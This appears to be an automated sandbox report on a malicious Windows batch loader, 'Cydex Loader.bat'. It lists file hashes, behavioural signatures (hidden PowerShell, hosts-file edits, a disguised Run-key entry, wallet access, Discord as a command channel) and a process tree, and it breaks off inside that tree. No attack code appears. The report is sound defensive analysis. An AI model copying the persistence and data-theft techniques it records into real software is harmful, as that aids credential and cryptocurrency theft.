Analysis

max time kernel: 149s
max time network: 109s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/07/2024, 02:02

Static task: static1
Behavioral task: behavioral1
Sample: Cydex Loader.bat
Resource: win10v2004-20240709-en
General

Target: Cydex Loader.bat
Size: 13.0MB
MD5: fd5e34bb3be950c5d99328d838c90fec
SHA1: 4ae0bf222014e8ddd1b897f2196b535c5d5aabcb
SHA256: d8f5a306f726f64899ff24c1fbd7be438093ef89bed6ef8cec9fa0494f1b90d7
SHA512: da68361bf220bc719920c9162e7295fff5fcbd3daa5e16bf36fb50ebc8cfa81747e016455f2ab4941f2527d06cc169991ef9f3ba036a7a62a3a27c8534730e28
SSDEEP: 49152:YuUvQg4JoDocb7J+qkGyye2opfp+xtvwP6Tb2QSBn+3nSJRa7d5oj2vO2Y4yUiiF:Y1
Malware Config
Signatures

- Blocklisted process makes network request (4 IoCs)
  flow | pid | Process
  21 | 2532 | powershell.exe
  22 | 2532 | powershell.exe
  24 | 2532 | powershell.exe
  26 | 2532 | powershell.exe

- Command and Scripting Interpreter: PowerShell (1 TTPs, 3 IoCs)
  Run Powershell and hide display window.
  pid | Process
  2532 | powershell.exe
  3148 | powershell.exe
  2828 | powershell.exe

- Drops file in Drivers directory (3 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | powershell.exe
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe

- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

- Adds Run key to start application (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" | powershell.exe

- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  22 | discord.com
  19 | discord.com

- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  25 | ip-api.com

- Drops file in System32 directory (4 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | attrib.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe

- Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
  Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
  Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe

- Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine videocard installed.
  pid | Process
  2148 | wmic.exe

- GoLang User-Agent (1 IoCs)
  Uses default user-agent string defined by GoLang HTTP packages.
  description | flow | ioc
  HTTP User-Agent header | 26 | Go-http-client/1.1
- Modifies data under HKEY_USERS (41 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
- Modifies registry class (23 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133652233350630982" | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133652233982518146" | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133652233633962715" | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133652233644596711" | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU | svchost.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Explorer.EXE
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133652233638025434" | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133650097564967226" | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133650097567154891" | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133652234275345566" | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133652234303246894" | svchost.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2828 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2828 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  4160 | powershell.exe
  4160 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  3148 | powershell.exe
  3148 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
  2532 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2532 | powershell.exe
  Token: SeAssignPrimaryTokenPrivilege | 2188 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 2188 | svchost.exe
  Token: SeSecurityPrivilege | 2188 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 2188 | svchost.exe
  Token: SeLoadDriverPrivilege | 2188 | svchost.exe
  Token: SeSystemtimePrivilege | 2188 | svchost.exe
  Token: SeBackupPrivilege | 2188 | svchost.exe
  Token: SeRestorePrivilege | 2188 | svchost.exe
  Token: SeShutdownPrivilege | 2188 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 2188 | svchost.exe
  Token: SeUndockPrivilege | 2188 | svchost.exe
  Token: SeManageVolumePrivilege | 2188 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 2188 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 2188 | svchost.exe
  Token: SeSecurityPrivilege | 2188 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 2188 | svchost.exe
  Token: SeLoadDriverPrivilege | 2188 | svchost.exe
  Token: SeSystemtimePrivilege | 2188 | svchost.exe
  Token: SeBackupPrivilege | 2188 | svchost.exe
  Token: SeRestorePrivilege | 2188 | svchost.exe
  Token: SeShutdownPrivilege | 2188 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 2188 | svchost.exe
  Token: SeUndockPrivilege | 2188 | svchost.exe
  Token: SeManageVolumePrivilege | 2188 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 2188 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 2188 | svchost.exe
  Token: SeSecurityPrivilege | 2188 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 2188 | svchost.exe
  Token: SeLoadDriverPrivilege | 2188 | svchost.exe
  Token: SeSystemtimePrivilege | 2188 | svchost.exe
  Token: SeBackupPrivilege | 2188 | svchost.exe
  Token: SeRestorePrivilege | 2188 | svchost.exe
  Token: SeShutdownPrivilege | 2188 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 2188 | svchost.exe
  Token: SeUndockPrivilege | 2188 | svchost.exe
  Token: SeManageVolumePrivilege | 2188 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 2188 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 2188 | svchost.exe
  Token: SeSecurityPrivilege | 2188 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 2188 | svchost.exe
  Token: SeLoadDriverPrivilege | 2188 | svchost.exe
  Token: SeSystemtimePrivilege | 2188 | svchost.exe
  Token: SeBackupPrivilege | 2188 | svchost.exe
  Token: SeRestorePrivilege | 2188 | svchost.exe
  Token: SeShutdownPrivilege | 2188 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 2188 | svchost.exe
  Token: SeUndockPrivilege | 2188 | svchost.exe
  Token: SeManageVolumePrivilege | 2188 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 2188 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 2188 | svchost.exe
  Token: SeSecurityPrivilege | 2188 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 2188 | svchost.exe
  Token: SeLoadDriverPrivilege | 2188 | svchost.exe
  Token: SeSystemtimePrivilege | 2188 | svchost.exe
  Token: SeBackupPrivilege | 2188 | svchost.exe
  Token: SeRestorePrivilege | 2188 | svchost.exe
  Token: SeShutdownPrivilege | 2188 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 2188 | svchost.exe
  Token: SeUndockPrivilege | 2188 | svchost.exe
  Token: SeManageVolumePrivilege | 2188 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 2188 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 2188 | svchost.exe
  Token: SeSecurityPrivilege | 2188 | svchost.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  pid | Process
  3464 | Explorer.EXE
  3464 | Explorer.EXE

- Suspicious use of UnmapMainImage (1 IoCs)
  pid | Process
  3464 | Explorer.EXE

- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 3232 wrote to memory of 3948 | 3232 | cmd.exe | 87
  PID 3232 wrote to memory of 3948 | 3232 | cmd.exe | 87
  PID 3232 wrote to memory of 2532 | 3232 | cmd.exe | 88
  PID 3232 wrote to memory of 2532 | 3232 | cmd.exe | 88
  PID 2532 wrote to memory of 3464 | 2532 | powershell.exe | 56
  PID 2532 wrote to memory of 1864 | 2532 | powershell.exe | 34
  PID 2532 wrote to memory of 440 | 2532 | powershell.exe | 16
  PID 2532 wrote to memory of 1368 | 2532 | powershell.exe | 25
  PID 2532 wrote to memory of 1564 | 2532 | powershell.exe | 28
  PID 2532 wrote to memory of 1756 | 2532 | powershell.exe | 31
  PID 2532 wrote to memory of 1556 | 2532 | powershell.exe | 27
  PID 2532 wrote to memory of 964 | 2532 | powershell.exe | 12
  PID 2532 wrote to memory of 1356 | 2532 | powershell.exe | 24
  PID 2532 wrote to memory of 764 | 2532 | powershell.exe | 74
  PID 2532 wrote to memory of 1340 | 2532 | powershell.exe | 23
  PID 2532 wrote to memory of 1928 | 2532 | powershell.exe | 35
  PID 2532 wrote to memory of 2712 | 2532 | powershell.exe | 48
  PID 2532 wrote to memory of 1332 | 2532 | powershell.exe | 22
  PID 2532 wrote to memory of 2704 | 2532 | powershell.exe | 47
  PID 2532 wrote to memory of 2296 | 2532 | powershell.exe | 66
  PID 2532 wrote to memory of 1304 | 2532 | powershell.exe | 69
  PID 2532 wrote to memory of 908 | 2532 | powershell.exe | 11
  PID 2532 wrote to memory of 512 | 2532 | powershell.exe | 14
  PID 2532 wrote to memory of 1692 | 2532 | powershell.exe | 30
  PID 2532 wrote to memory of 2080 | 2532 | powershell.exe | 39
  PID 2532 wrote to memory of 3652 | 2532 | powershell.exe | 72
  PID 2532 wrote to memory of 2064 | 2532 | powershell.exe | 38
  PID 2532 wrote to memory of 2260 | 2532 | powershell.exe | 41
  PID 2532 wrote to memory of 1076 | 2532 | powershell.exe | 18
  PID 2532 wrote to memory of 1856 | 2532 | powershell.exe | 33
  PID 2532 wrote to memory of 3036 | 2532 | powershell.exe | 51
  PID 2532 wrote to memory of 2640 | 2532 | powershell.exe | 45
  PID 2532 wrote to memory of 1440 | 2532 | powershell.exe | 68
  PID 2532 wrote to memory of 1636 | 2532 | powershell.exe | 29
  PID 2532 wrote to memory of 2432 | 2532 | powershell.exe | 43
  PID 2532 wrote to memory of 1096 | 2532 | powershell.exe | 19
  PID 2532 wrote to memory of 2424 | 2532 | powershell.exe | 42
  PID 2532 wrote to memory of 2620 | 2532 | powershell.exe | 44
  PID 2532 wrote to memory of 3600 | 2532 | powershell.exe | 57
  PID 2532 wrote to memory of 1036 | 2532 | powershell.exe | 17
  PID 2532 wrote to memory of 3396 | 2532 | powershell.exe | 55
  PID 2532 wrote to memory of 788 | 2532 | powershell.exe | 8
  PID 2532 wrote to memory of 3188 | 2532 | powershell.exe | 54
  PID 2532 wrote to memory of 620 | 2532 | powershell.exe | 15
  PID 2532 wrote to memory of 1996 | 2532 | powershell.exe | 36
  PID 2532 wrote to memory of 1204 | 2532 | powershell.exe | 21
  PID 2532 wrote to memory of 2188 | 2532 | powershell.exe | 40
  PID 2532 wrote to memory of 4548 | 2532 | powershell.exe | 65
  PID 2532 wrote to memory of 1788 | 2532 | powershell.exe | 32
  PID 2532 wrote to memory of 1392 | 2532 | powershell.exe | 26
  PID 2532 wrote to memory of 1184 | 2532 | powershell.exe | 20
  PID 788 wrote to memory of 5064 | 788 | svchost.exe | 90
  PID 788 wrote to memory of 5064 | 788 | svchost.exe | 90
  PID 2532 wrote to memory of 2184 | 2532 | powershell.exe | 91
  PID 2532 wrote to memory of 2184 | 2532 | powershell.exe | 91
  PID 2532 wrote to memory of 2828 | 2532 | powershell.exe | 92
  PID 2532 wrote to memory of 2828 | 2532 | powershell.exe | 92
  PID 2532 wrote to memory of 2996 | 2532 | powershell.exe | 93
  PID 2532 wrote to memory of 2996 | 2532 | powershell.exe | 93
  PID 2532 wrote to memory of 924 | 2532 | powershell.exe | 94
  PID 2532 wrote to memory of 924 | 2532 | powershell.exe | 94
  PID 2532 wrote to memory of 1748 | 2532 | powershell.exe | 95
  PID 2532 wrote to memory of 1748 | 2532 | powershell.exe | 95
  PID 2532 wrote to memory of 4160 | 2532 | powershell.exe | 96

- Views/modifies file attributes (1 TTPs, 4 IoCs)
  pid | Process
  4896 | attrib.exe
  4964 | attrib.exe
  2184 | attrib.exe
  2996 | attrib.exe
Processes

- C:\Windows\system32\svchost.exe (PID 788)
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p
  Signatures: Modifies registry class; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\wbem\wmiprvse.exe (PID 5064)
    Command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - C:\Windows\system32\backgroundTaskHost.exe (PID 3252)
    Command line: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  - C:\Windows\system32\BackgroundTransferHost.exe (PID 1444)
    Command line: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  - C:\Windows\system32\backgroundTaskHost.exe (PID 844)
    Command line: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  - C:\Windows\System32\RuntimeBroker.exe (PID 4964)
    Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - C:\Windows\system32\DllHost.exe (PID 4948)
    Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- C:\Windows\system32\svchost.exe (PID 908)
  Command line: C:\Windows\system32\svchost.exe -k RPCSS -p
- C:\Windows\system32\svchost.exe (PID 964)
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe (PID 512)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe (PID 620)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe (PID 440)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe (PID 1036)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe (PID 1076)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
- C:\Windows\system32\svchost.exe (PID 1096)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
- C:\Windows\system32\svchost.exe (PID 1184)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\System32\svchost.exe (PID 1204)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- C:\Windows\System32\svchost.exe (PID 1332)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\system32\svchost.exe (PID 1340)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\system32\svchost.exe (PID 1356)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
- C:\Windows\system32\svchost.exe (PID 1368)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\system32\svchost.exe (PID 1392)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe (PID 1556)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\system32\svchost.exe (PID 1564)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\System32\svchost.exe (PID 1636)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\System32\svchost.exe (PID 1692)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- C:\Windows\System32\svchost.exe (PID 1756)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe (PID 1788)
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\system32\svchost.exe (PID 1856)
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\System32\svchost.exe (PID 1864)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe (PID 1928)
